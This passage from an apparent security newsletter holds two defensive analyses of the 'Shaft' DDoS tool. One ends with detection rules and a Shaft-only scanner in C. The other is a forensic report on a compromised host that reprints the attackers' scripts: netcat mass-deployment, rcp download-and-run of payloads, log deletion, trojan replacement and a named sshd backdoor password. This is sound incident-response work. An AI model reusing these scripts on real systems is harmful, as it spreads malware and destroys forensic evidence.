intrusion phase (see also [5]).

The program uses UDP traffic for its communication between the handlers
and the agents. Considering that the traffic is not encrypted, it can
easily be detected based on certain keywords. Performing an "ngrep" [11]
for the keywords mentioned in the syntax sections (3.3.1 and 3.3.2), will
locate the control traffic, and looking for TCP packets with sequence
numbers of 0x28374839 may locate the TCP SYN packet flood traffic.
Source ports are always above 1024, and source IP numbers can
include zeroes in the leading octet.

Strings in this control traffic can be detected with the "ngrep"
program using the same technique shown in [5], [6], and [7]. For
example,

# ngrep -i -x "alive tijgu" udp

# ngrep -i -x "pktres|pktstat" udp

will locate the control traffic between the handler and the agent,
independently of the port number used.

There are also two excellent scanners for detecting DDoS agents on the
network: Dittrich's "dds" [8] and Brumley's "rid" [2].

"dds" was written to provide a more portable and less dependant
means of scanning for various DDoS tools. (Many people encountered
problems with Perl and the Net::RawIP library [15] on their systems,
which prevented them from using the scripts provided in [5], [6],
and [7].) Due to time contraints during coding, "dds" does not have
the flexibility necessary to specify arbitrary protocols, ports, and
payloads. A modified version of "dds", geared towards detecting only
"Shaft" agents, is included in the Appendix.

A better means of detecting "Shaft" handlers and agents would be to
use a program like "rid", which uses a more flexible configuration
file mechanism to define ports, protocols, and payloads.

A sample configuration for "rid" to detect the "Shaft" control traffic
as described:

start shaft
send udp dport=18753 data="alive tijgu hi 5 1918"
recv udp sport=20433 data="alive" nmatch=1
end shaft

-- 3.6 Defenses
---------------

To protect against the effects of the multiple types of denial of
service, we suggest that you review the other papers (see [1, 3, 5, 6,
7]) and other methods of dealing with DDoS attacks being discussed
and promoted (see [9]).

For example, rate-limiting is considered effective against ICMP packet
flooding attacks, while anti-spoof filters and egress filters at the
border routers can limit the problems caused by attacking agents
faking source addresses.

-- 4. Further evolution
-----------------------

While the author(s) of this tool did not pursue the use of encryption
of its control traffic, such an evolution is conceivable, since a Caesar
cipher is used to obfuscate the password. A transition to Blowfish or
other stream ciphers is realistic, and changing the communication protocol
to ICMP, much like TFN, is conceivable. The use of multicast protocols
for both communication or packet flooding is also possible.

To date, no source for the "Shaft" handler ("shaftmaster") has been
obtained of analyzed.

At this stage, the code is believed to be private. This would mean that
the authors could likely change defaults and the probability of detecting
"script kiddie" copycats using default values as analyzed here is low.
This would argue for rapid and widespread detection efforts to identify
agents before this change.

-- 5. Conclusion
----------------

"Shaft" is another DDoS variant with independent origins. The code
recovered did appear to be still in development. Several key
features indicate evolutionary trends as the genre develops.
Of significance is the priority placed on packet generation
statistics which would allow host selection to be refined. The
analysis of the code and binary was greatly enhanced by the capture
of attack preparation and command packets. The captured packets
made it possible to assess the impact of a single agent that managed
to saturate the network pipe.

The version analyzed had hooks which would allow for dynamic changes
to the master host and control port but not the agent control port.
However such items are trivially incorporated and must not be taken
to be indicative of any current versions which may be in active use.
The obfuscation of master IP, ports and passwords used a relatively
simple form of encryption but this could easily be strengthened.

The detection of DDoS installations will become very much more
difficult as such metamorphosis techniques progress, the presence of
such agents will still be more readily determined by analysis of
traffic anomalies with a consequent pressure on time and resources
for site administrators and security teams.


-- APPENDIX A: References
-------------------------

[1] Barlow, Jason and Woody Thrower. TFN2K An Analysis
http://www2.axent.com/swat/News/TFN2k_Analysis.htm

[2] Brumley, David. Remote Intrusion Detector.
http://theorygroup.com/Software/RID

[3] CERT Distributed System Intruder Tools Workshop report
http://www.cert.org/reports/dsit_workshop.pdf

[4] CERT Advisory CA-99-17 Denial-of-Service Tools
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

[5] Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/trinoo.analysis

[6] Dittrich, David. The "Tribe Flood Network" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/tfn.analysis

[7] Dittrich, David. The "Stacheldraht" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

[8] Dittrich, David, Marcus Ranum, George Weaver, David Brumley et al.
http://staff.washington.edu/dittrich/dds

[9] Dittrich, David, Distributed Denial of Service (DDoS) Attacks/Tools
http://staff.washington.edu/dittrich/misc/ddos/

[10] lsof:
http://vic.cc.purdue.edu/

[11] ngrep:
http://www.packetfactory.net/ngrep/

[12] Packet Storm Security, Distributed denial of service attack tools
http://packetstorm.securify.com/distributed/

[13] Phrack Magazine, Volume Seven, Issue Forty-Nine,
File 06 of 16, [ Project Loki ]
http://www.phrack.com/search.phtml?view&article=p49-6

[14] Phrack Magazine Volume 7, Issue 51 September 01, 1997,
article 06 of 17 [ L O K I 2 (the implementation) ]
http://www.phrack.com/search.phtml?view&article=p51-6

[15] Net::RawIP:
http://quake.skif.net/RawIP

[16] tcpdump:
ftp://ftp.ee.lbl.gov/tcpdump.tar.Z

[17] Schneier, Bruce. Applied Cryptography, 2nd edition, Wiley.

[18] Stevens, W. Richard and Gary R. Wright. TCP/IP Illustrated, Vol. I, II,
and III., Addison-Wesley.

[19] Zuckerman, M.J. Net hackers develop destructive new tools. USA Today,
7 December 1999.
http://www.usatoday.com/life/cyber/tech/review/crg681.htm

-- APPENDIX B: dds ("Shaft" only variant)

/*
* dds $Revision: 1.6s $ - a distributed DoS tool scanner - Shaft only
*
* Based on the gag scanner, written by David Dittrich, University
* of Washington, Marcus Ranum, Network Flight Recorder, with
* code contributed by others, and based on an idea stolen from
* George Weaver, Pennsylvania State University.
*
* Dave Dittrich <dittrich@cac.washington.edu>
* Marcus Ranum <mjr@nfr.net>
* George Weaver <gmw@psu.edu>
* David Brumley <dbrumley@rtfm.stanford.edu>
*/


/* Shaft only version, modified to that effect by
* Sven Dietrich <spock@sled.gsfc.nasa.gov>
*/


#if YOU_HAVE_NOT_READ_THIS_YET

This software should only be used in compliance with all applicable laws and
the policies and preferences of the owners of any networks, systems, or hosts
scanned with the software

The developers and licensors of the software provide the software on an "as
is"
basis, excluding all express or implied warranties, and will not be liable
for any damages arising out of or relating to use of the software.

THIS SOFTWARE IS MADE AVAILABLE "AS IS", AND THE UNIVERSITY OF WASHINGTON
DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, WITH REGARD TO THIS SOFTWARE,
INCLUDING WITHOUT LIMITATION ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE, AND IN NO EVENT SHALL THE UNIVERSITY OF
WASHINGTON BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, TORT (INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING
OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

#endif

#define VERSION "$Revision: 1.6s $"

#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>

#define BS 1024
#define __FAVOR_BSD

/* The two arrays below are for address range calculations. They
should have been automatically generated, but
1) I am lazy.
2) There are a few special cases in them.

I will not scan more than a /16. When we do scan a CIDR block, we
assume that it actually is a CIDR block, and do not scan the
network or broadcast address.

*/


static unsigned long MaskBits[] = {
0x00000000, /* /0 */
0x00000000, /* /1 */
0x00000000, /* /2 */
0x00000000, /* /3 */
0x00000000, /* /4 */
0x00000000, /* /5 */
0x00000000, /* /6 */
0x00000000, /* /7 */
0x00000000, /* /8 */
0x00000000, /* /9 */
0x00000000, /* /10 */
0x00000000, /* /11 */
0x00000000, /* /12 */
0x00000000, /* /13 */
0x00000000, /* /14 */
0x00000000, /* /15 */
0xffff0000, /* /16, Class B */
0xffff8000, /* /17, 128 * Class C */
0xffffc000, /* /18, 64 * Class C */
0xffffe000, /* /19, 32 * Class C */
0xfffff000, /* /20, 16 * Class C */
0xfffff800, /* /21, 8 * Class C */
0xfffffc00, /* /22, 4 * Class C */
0xfffffe00, /* /23, 2* Class C */
0xffffff00, /* /24, Class C */
0xffffff80, /* /25, 128 hosts */
0xffffffc0, /* /26, 64 hosts */
0xffffffe0, /* /27, 32 hosts */
0xfffffff0, /* /28, 16 hosts */
0xfffffff8, /* /29, 8 hosts */
0xfffffffc, /* /30, 4 hosts (PPP link) */
0xfffffffe, /* /31, invalid */
0xffffffff, /* /32, host */
};

static int NumHosts[] = {
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0, /* don't scan more than a /16 */
65534, /* These are all -2 so that we don't
scan the broadcast addr or the
network addr */

32766,
16382,
8190,
4094,
2046,
1022,
510,
254,
126,
62,
30,
14,
6,
2,
0,
1,
};

extern char *optarg;

struct udppkt_t {
struct ip ipi;
struct udphdr udpi;
char buffer[BS];
} udppkt;

static void listener();
static int usage();

static int vflg = 0; /* verbosity */
static int dflg = 0; /* debugging */

/* shaft variables */
static short shaft_dstport = 18753; /* handler listen port */
static short shaft_rctport = 20433; /* agent listen port */
char shaft_scmd[] = "alive";
char shaft_spass[] = "tijgu";
char shaft_echostr[] = "alive";

int
main(int argc, char **argv)
{
int pid, host;
char target[128];
unsigned long target_host;
struct in_addr target_ip;
int mask;
char * mask_ptr;
int result;
int usock;
char buf[BS];
struct sockaddr_in
usa;
int i;
char *jnk1;
char *jnk2;
int sleepytime = 500;
int bigsleep = 30;
int num_hosts;
char scmd[BS], spass[BS], sbuf[BS];

while((i = getopt(argc,argv,"ds:S:v")) != -1) {
switch(i) {
case 'd':
dflg++;
break;
case 's':
sleepytime = atoi(optarg);
if(sleepytime <= 0) {
fprintf(stderr,"WARNING: zero interping sleep time will probably overflow your sy
stem's transmit buffers and yield poor results\n"
);
sleepytime = 1;
}
break;
case 'S':
bigsleep = atoi(optarg);
if(bigsleep <= 0) {
fprintf(stderr,"WARNING: negative sleep value - staying with default of %d\n", bi
gsleep);
}
break;
case 'v':
vflg++;
break;
default:
exit(usage());
}
}

if(optind >= argc || argc - optind > 1)
exit(usage());

mask_ptr = strchr(argv[optind], '/');

/* if a CIDR block is passed in */
if (mask_ptr) {
*mask_ptr = '\0';
mask_ptr ++;

sscanf(mask_ptr, "%d", &mask);

} else {
printf("No mask passed, assuming host scan (/32)\n");
mask = 32;
}


result = inet_aton(argv[optind], &target_ip);

if (result == 0) {
fprintf(stderr, "%s: Bad IP address: %s\n", argv[0],
argv[optind]);
exit(-1);
}

if (mask < 16) {
fprintf(stderr, "Bad Network Admin! Bad! Do not scan more than a /16 at once!\n");
exit(-1);
}

num_hosts = NumHosts[mask];

if (num_hosts == 0) {
fprintf(stderr, "Cannot scan a /%d. Exiting...\n", mask);
exit(-1);
}

if(vflg) {
printf("Mask: %d\n", mask);
printf("Target: %s\n", inet_ntoa(target_ip));
printf("dds %s - scanning...\n\n", VERSION);
}

sprintf(sbuf,"%s %s hi 5 1918",shaft_scmd,shaft_spass);

target_host = ntohl(target_ip.s_addr);
target_host &= MaskBits[mask];

target_ip.s_addr = htonl(target_host);

if((pid = fork()) < 0) {
perror("cannot fork");
exit(1);
}

/* child side listens for return packets */
if (pid == 0)
listener();

sleep(1);

/* main sweep loop - COULD be expanded to whole Internet but... */
/* but that would be _very_ bad.... */
while (num_hosts) {
if (mask != 32) {
target_host ++;
}
target_ip.s_addr = htonl(target_host);

num_hosts--;

/* we really need to skip the network and broadcast addresses */
if ((target_host & 0xff) == 0 || (target_host & 0xff) == 0xff) {
if(vflg)
printf("Skipping special address %s\n", inet_ntoa(target_ip));
continue;
}

if(vflg)
printf("Probing address %s\n", inet_ntoa(target_ip));

/* shaft check */
bzero((char *) &usa, sizeof(usa));
usa.sin_family = AF_INET;
usa.sin_addr.s_addr = target_ip.s_addr;
usa.sin_port = htons(shaft_dstport);

if (dflg)
fprintf(stderr,"Sending UDP to: %s\n",
inet_ntoa(usa.sin_addr));
if ((usock = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("cannot open UDP socket");
exit(1);
}

i = sendto(usock,sbuf,strlen(sbuf), 0,
(struct sockaddr *)&usa,
sizeof(usa));

if (i < 0) {
char ebuf[BS];
sprintf(ebuf,"sendto: udp %s",
inet_ntoa(usa.sin_addr));
perror(ebuf);
break;
}
close(usock);

usleep(sleepytime);
}


/* wait for any late responses */
if (dflg)
fprintf(stderr,"Waiting %d seconds for late responses.\n",
bigsleep);
sleep(bigsleep);

/* shut listener. if this fails the listener exits on its own */
(void)kill(pid, SIGHUP);
exit(0);
}


static void listener()
{
int usock;
int i, len;
fd_set fdset;
char buf[BS];
char rcmd[BS], filler[BS], rpass[BS];
struct timeval timi;
struct udppkt_t
upacket;
struct sockaddr_in
sa, from;

/* child becomes a listener process */

if ((usock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("cannot open raw UDP listen socket");
exit(1);
}

bzero((char *) &sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons(shaft_rctport);

if (bind(usock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
perror("cannot bind to socket");
exit(-1);
}

while (1) {
/* if parent has exitted, die */
if(getppid() == 1)
exit(0);

FD_ZERO(&fdset);
FD_SET(usock, &fdset);
timi.tv_sec = 1;
timi.tv_usec = 0;
select(FD_SETSIZE, &fdset, NULL, NULL, &timi);
usleep(100);
if (FD_ISSET (usock, &fdset)) {
/* read data from UDP listen socket */
memset((void *) &upacket, 0, sizeof(struct udppkt_t));
len = sizeof(from);
#if 1
if ((i = recvfrom(usock, buf, BS, 0,
(struct sockaddr *) &from, &len)) < 0) {
perror("recvfrom");
continue;
}
#else
i = read (usock, (char *) buf, BS) -
(sizeof (struct ip) + sizeof (struct udphdr));
#endif
sa.sin_addr.s_addr = upacket.ipi.ip_src.s_addr;
if(dflg)
fprintf(stderr,
"Listener got a UDP packet on port %s\n",
shaft_rctport);

/* shaft check */
if (strstr(buf,shaft_echostr)) {
printf("Received '%s' from %s",
shaft_echostr,
inet_ntoa(from.sin_addr));
printf(" - probable shaft agent\n");
}
else {
printf("Unexpected UDP packet received on port %d from %s\n",
shaft_rctport, inet_ntoa(from.sin_addr));
}
}
}
}


static int
usage()
{
fprintf(stderr,"usage: dds [options] <target>\n");
fprintf(stderr,"target is CIDR block to scan in form:\n");
fprintf(stderr,"\tA.B.C.D/mask\n");
fprintf(stderr,"Options:\n");
fprintf(stderr,"\t[-v] turns on verbosity\n");
fprintf(stderr,"\t[-d] turns on debugging\n");
fprintf(stderr,"\t[-s] interpacket sleep in microseconds\n");
fprintf(stderr,"\t[-S] delay for late packets\n");

return(1);
}

---
Dr. Sven Dietrich Raytheon ITSS | spock@sled.gsfc.nasa.gov
ESDIS Project, Code 586, Blg 32 Rm N231 | +1-301-614-5119 | 614-5270 Fax
NASA Goddard Space Flight Center | Greenbelt, MD 20771, USA

@HWA


111.1 Shaft Node/Master analysis by Rick Wash & Jose Nazario
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: PSS

--J/dobhs11T7y2rNN
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

---[ ]---

Analysis of a Shaft Node and Master
March 26, 2000

---[ ]---

Rick Wash
rlw6@po.cwru.edu

Jose Nazario
jose@biocserver.cwru.edu


Section 0: Introduction
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

This analysis is in addition to Sven Dietrich's analysis, dated March 16, 2=
000,
of the Shaft DDoS tool. The analysis we provide here is a description of t=
he
rootkit used and the methods of distribution of the tool. We share this=20
information so that other site and system administrators can examine their
systems for comprimise and use as Shaft nodes.=20

Note: This file can be found at:
http://biocserver.cwru.edu/~jose/shaft_analysis/

The user names and host ID's have been munged. We have tried to contact the
domain admins whose networks have appeared anywhere in any of these files.

---------[ How We Found This Information

Once we were alerted that our machine may have been compromised, we perform=
ed
both network and host based scans. A network port scan (using nmap) reveal=
ed
port 5002/tcp open and listening. Furthermore, it revealed port 22/tcp (ss=
h)
open, which was not installed by the system administrator.

A host based scan revealed similarly that port 5002/tcp was listening. An
analysis with rpm -Va revealed differences in sizes and MD5 sums for the
components of the root kit, but did not reveal the Shaft toolkit. At this =
time
the system was taken offline and the disk was mounted in another trusted sy=
stem
and analyzed from there. =20

Local administrators had noted that the system had become unstable over aut=
umn,
corresponding to the tests of the Shaft DDoS tool. =20


Section 1: The Rootkit Used
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D

----------------[ What We Found
=20
One of the significant things we found while analyzing the box was a direct=
ory
and set of files that I will call the sda69 toolkit. It was found in /dev
(/dev/sda69 and 4 files sda69[a-d]). This appears to be the attackers work=
ing
directory, so most of their scripts and files are stored there.

It appears that much of their older work from when they originally compromi=
sed=20
the box was stored in a subdirectory called ". " (dot space, "/dev/sda69/. =
"
).
This directory contained 6 files that compromised a system for sniffing the
ethernet network and analyzing the sniffer logs. Here is a list of files a=
nd
what they do:

-rwxr-xr-x 1 0 20 28969 Apr 4 1999 idle

This was their sniffer. It was designed to sniff ports 21/tcp and 23/tcp (=
ftp=20
and telnet, respectively). It was capture the first x number of bytes of e=
ach
connection, log them to a file, and move on to the next connection. This w=
as
used to gather passwords, since both ftp and telnet send passwords over
plaintext. This sniffer only logged in one direction (the data flowing from
the machine that started the connection to the destination machine). This =
was
done because the other direction rarely contains useful information. The
output file in this case was tcp.log. The program was named idle probably =
to
fool any sysadmin who noticed it in ps and make them believe it was just id=
le
time.

-rw-r--r-- 1 0 0 456799 Jun 11 1999 tcp.log

This was their sniffer log. It contained data in the form:
src_ip =3D> dst_ip [port]
data
=2E..

----- [method of connection termination]
This log only contained information for ports 21 and 23. It did also conta=
in a
number of passwords.

-rwxr-xr-x 1 0 0 2795 May 12 1999 pp.pl

This was a perl script that extracted usernames and passwords from their
sniffer log files.

-rw-r--r-- 1 0 0 6 Apr 28 1999 sniff.pid

This is a standard pid lock file for the sniffer.=20

-rw-r--r-- 1 0 20 7654 Apr 4 1999 s

A simple SYN flood program.

-rwxrwxr-x 1 0 0 7656 Aug 28 1998 chattr

This is the standard linux chattr program, linked dynamically against libc6=
. =20

This material in ". " shows that the attackers did use this box for sniffing
passwords from the ethernet network that it was connected to. It is curren=
tly
unknown if the attackers did any thing else during this time frame (May-June
1999).

--------[ Linux Trojan Horse Programs Found

Investigation of the Linux host comprimised yielded the following trojan
horse programs. They were found by mounting the disc read-only and without
executable permissions set. A full recursive file listing was then=20
performed (ls -lartRi /mnt) which quickly revealed the trojan horse binarie=
s:

20563 -rwxrwxr-x 1 root root 437428 Sep 15 1998 vi
20554 -rwxrwxr-x 1 root root 262756 Oct 2 1998 tcsh
313370 -r-xrwxr-x 1 root root 31312 Oct 3 1998 ps

Examination of the binaries using strings(1), together with additional files
on the system, reveals the method of operation of the new binaries.=20

The file sizes were sometimes larger, most likely due to being statically
linked against an older C library (libc5 on a libc6 system).

On a running host, examination by using RPM in verify mode (rpm -Va) showed
file sizes, permissions and MD5 sums were off when compared to the database
on the system.=20

ls

The ls trojan we found has the effect of not listing files listed in a=20
hidden configuration file, /dev/sda69c. As such, it's highly extensible.=20
Several utiities were hidden, including elements of the Shaft toolkit and
even some terminals.

netstat

Examination of the replaced netstat binary reveals that it is used to
hide connections to or from certain networks and on certain ports. The
networks and ports were configured using the file /dev/sda69b, an additional
element of the rootkit.

ps

Again, used to hide activity. The trojan horse ps(1) binary makes a referen=
ce
to the file /dev/sda69a, which contains a listing of processes and terminals
to hide. A fairly typical rootkit listing, including sniffers, scanners,
the eggdrop IRC script, and the backdoored sshd.

updatedb

The program updatedb(1L), normally a link to slocate(1), was replaced with=
=20
shell script. Again, used to hide signs of the rootkit tools.

locate

Similar to updatedb's trojan, used to hide the rootkit and Shaft toolkit.

find

Again, used to hide the toolkits, calls the file /dev/sda69c in a similar
way to the ls trojan to hide files.

dir
vdir

See ls, used in the same fashion.

killall

Replaced, calls /dev/sda69a, a listing of processes and terminals. Used to
prevent the halting of the intruder's processes.=20

syslogd

Replaced, calls /dev/sda69d, a list of domains. Presumably it prevents logg=
ing
when hosts from these domains connect.

tcpd

The TCP wrappers executable, calls /dev/sda69b and prevents access checking
from those networks and on those ports.

inetd

Appears to be a combined portmapper and inetd daemon, perhaps to allow for
access or system control via RPC calls.

sshd

Trojaned sshd 1.2.26, static linked against libc5. Contains a backdoor
password "rOOTkIT" which yeilds a root shell without logging.

ifconfig

Replaced, with the trojan version omitting any reporting of the PROMISC=20
setting, hiding the use of the sniffing software.


-----------[ Solaris SPARC Trojans Found

During the course of our investigation into the toolkit, we also found seve=
ral
key binaries for Solaris as trojan horse programs. Witin the archive (neet.=
tar)
there is a script plus several binary replacement for the SPARC acrhitectur=
e.
The script installs an inetd trojan, a ps and update trojan as well. These
are then run. Log wiping is also done. System comprimise is presumably
through a known exploit. We performed no real analysis on the trojan horse
programs for SPARC as we did not examine a Solaris node of the Shaft tool.


-rwx------ 1 510 510 39544 Mar 18 1999 doc

This appears to be their trojaned SPARC Solaris inetd binary.

-rwx------ 1 510 510 24356 Mar 18 1999 ps

This appears to be their trojaned SPARC Solaris ps binary.

-rwx------ 1 510 510 25548 Mar 18 1999 update

Solaris does not use update, though SunOS 4.x did. This is probably to=20
confuse the administrator should they stumble across the file. According to
George Weaver <weaver@gabriel.nso.psu.edu> this is a standard solsniffer, a
Solaris sniffer. The logfiles are expected to be in /usr/man/tmp/output on=
=20
infected Solaris boxes. =20


----------[ Trojan Executable Configuration Files

In addition to these files, four more files were recovered that appear to
contain information used by the rootkit that was installed on this system.
These files are /dev/sda69[a-d]. Here is a listing of what is contained in
these files:

sda69a

This file has the format:
<number> <name>
where number indicates what type of information follows (always either 1 or=
3)
and name indicates the data. For this file, 1 indicates that what follows =
is a
terminal name, and 3 indicates that what follows is a executable name. This
file is used by the trojaned ps and killall to prevend the sysadmin from se=
eing
or killing the executables listed here, or anything from the listed termina=
ls.
The contents of the file:

3 egg
3 linsniffer
1 p0
1 p1
3 sniffer
3 mscan
3 bash
3 idle
3 screen
3 ssynk4
3 sshd
3 ssh
3 sshd1
3 s

sda69b
=20
The format of this file is the same as the format of sda69a, but the conten=
ts
differ. The 1 in this case means that the data is a subnet to ignore. The=
3
in this case is a specific port number. This file is used by the trojaned
netstat and tcpd to know which IP's to hide, which IP's to always let in,
and which ports to hide. An example contents follows:


1 xxx.
3 6667
1 yyy.
3 23
1 zzz.
1 ddd.eee
1 ccc.
3 513
1 bbb.aaa.
3 22

Here, the three letter combinations represent single numbers from IP addres=
ses.=20
This file would specify that everyone from xxx.*.*.* would be allowed in th=
is
machine, and no connections from these IP's would appear in netstat. Also,
programs listening on ports 6667, 23, 513, and 22 (irc, telnet, rlogin, and
ssh) would not appear in a normal netstat.

sda69c

This file is a list of files, one file per line, that were installed on this
system by the attackers. This file is used by ls, dir, vdir, and find to k=
now
what files not to list when the admin tries to look through the filesystem.

sda69d

This file is a list of providers, one per line. This file is used by the
trojaned syslog to know what messages should not be logged.


Section 2: Distribution Methods of the Shaft Toolkit
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D

Their more recent work (which includes working with the Shaft DDoS tool) is=
all
in the base sda69 directory (/dev/sda69). Here is a list of files recovered
and what the do:

-rwxr-xr-x 1 0 0 25123 Nov 28 14:34 shaftmaster
-rwxr-xr-x 1 0 0 15184 Nov 28 14:47 shaftnode

This is the master and node executables for the Shaft DDoS tool. For more
information, see: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt

-rwxr-xr-x 1 0 0 19806 Nov 28 14:41 shaftnode.c

This is the source file for the Shaft node program. More information can be
found at the same location as above. =20

-rwxr-xr-x 1 0 0 165632 Nov 28 16:34 nc

This appears to be the standard netcat executable. This executable was=20
used by the scripts to remotely execute commands.

-rw-r--r-- 1 0 0 596 Nov 28 17:12 hitlist

This file contains a list of target machines, one machine per line. These
were evidently targets to receive the shaftnode program, having previously
been compromised.

-rwxr-xr-x 1 0 0 84 Nov 28 16:36 dos.sh

This shell script run the command dospipe.sh and sends the output to each of
the IP's in the file hitlist, port 21 (ftp). This script is a wrapper arou=
nd
dospipe.sh that executes it for each of the machines in hitlist and sends i=
t to
the machine. Here is the code from that file:

#!/bin/sh
for i in `cat hitlist` ; do (./dospipe.sh | ./nc -p 53982 $i 21 &) ; done

-rwxr-xr-x 1 0 0 186 Nov 28 16:41 dospipe.sh

This shell script outputs a series of commands that are intended to upload =
and
run a copy of their shaftnode executable to the target machine. This script
automates the process of uploading and running their node executables. Her=
e is
the code for the script:

#!/bin/sh
echo "oir##t"
echo "QUIT"
sleep 5
echo "cd /tmp"
sleep 5
echo "rcp user@host:shaftnode ./"
sleep 5
echo "chmod +x shaftnode"
sleep 5
echo "./shaftnode"
echo "exit"

The first couple lines (the first two echo commands) appear to signify that=
a
backdoor is being used on the target machines' ftp servers to get the roots=
hell
they need. The first two lines are sent to the trojanned ftp server, and t=
he=20
following lines appear to be commands send to a root shell.

-rwxr-xr-x 1 0 0 122880 Oct 24 02:13 duh.tar

This is a tar file archive of the next five files: bd.sh, bdpipe.sh, massbd=
.sh,
neet.tar and unf.

-rwxr-xr-x 1 0 0 104 Oct 24 01:55 unf

This file is another list of IP's, presumably a list of targets for this "b=
d"

system.

-rwxr-xr-x 1 0 0 10240 Oct 24 02:11 bd.sh

This, despite its file extension, is a tar file containing the two files
bdpipe.sh and massbd.sh. I believe that this being a tar file is a mistake=
and
that is should be a shell script that resembles the script dos.sh.

-rwxr-xr-x 1 0 0 53 Aug 7 1999 massbd.sh

This is a shell script that iterates through all of the lines in a file and
runs the scripts bd.sh on each of them in the background. This means that =
it
runs bd.sh on each of the lines in the file roughly at the same time. I
suppose that the file unf is used for this purpose. Here is the code for t=
he
script:

#!/bin/sh
for i in `cat $1`; do (./bd.sh $i &);done

-rwxr-xr-x 1 0 0 192 Aug 8 1999 bdpipe.sh

This is a file that is used to upload and install their trojans and rootkit=
s on
a SPARC machine, as well as delete the logs and such. It copies neet.tar o=
ver
to the target machine, run the script bd, and cleans up their work. Here is
the code for the script:

#!/bin/sh
echo "cd /tmp;"
echo "rcp user@host:neet.tar ./;"
sleep 4
echo "tar -xvf neet.tar;"
sleep 4
echo "./bd;"
sleep 10
echo "rm -rf neet.tar bd update*;"
sleep 10
echo "exit;"

It appears that they already have a root shell by the time this script is r=
un.
Getting the root shell could very well be the contents of the real bd.sh.

-rwxr-xr-x 1 0 0 102400 Aug 7 1999 neet.tar

This is a tar file that contains 4 other files: bd (a shell script), ps,
update, and doc (three SPARC executables).

-rwx------ 1 510 510 1076 Aug 5 1999 bd

This is a shell script. This is the executable that is run by the other
scripts once a system is compromised. This script does a number of things.
First of all it copies in its trojaned version of inetd. Secondly it remov=
es
most of the log files on the system that would implicate them. Then it runs
their trojaned inetd and tests it with a telnet session (presumably to test=
the
backdoor). Then is kills inetd, nfs, and ttdb. Next it runs their update
program. Finally it copies their ps program to replace the current system o=
ne.
Here is the full source of this script:

unset HISTFILE; unset SAVEHIST
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/r=
pc.ttdb* /usr/dt/bin/rpc.ttdb*
rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/a=
dm/sec*
rm -rf /usr/openwin/bin/rpc.cmsd
rm -rf /usr/dt/bin/rpc.cmsd
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;
ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
ps -ef | grep ttdb | grep -v grep | awk '{print "kill -9 " $2 }' > boo
chmod 700 boo
=2E/boo
rm -rf boo
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 \"./update -s -o output\" > /kernel/pssys
chmod 755 ps update
=2E/update -s -o output &
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update


Section 3: What You Can Do
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D

We have, we hope, outlined methods for administrators to examine their
systems for compromise by the distributors of the Shaft DDoS tool. A=20
combination of a generic rootkit together with the DDoS package created
a ring of machines which could be used to disrupt large network segments.

The most important thing is what is repeatedly said -- apply the vendor=20
patches for security updates and keep your system current. Access was gaine=
d,
no doubt, through well known holes which had patches released some time bef=
ore
by the vendor. This simple action would have prevented most of the nodes
of the tool form being acquired.

Secondly, any alert system administrator would have noticed the performance
of the machine degrade for no appearant reason. The local administrators of
this node complained of crashes and performance problems of this server, yet
were not qualified administrators. This is a standard problem, and one that
can be easily avoided by training or hiring competent administrators.
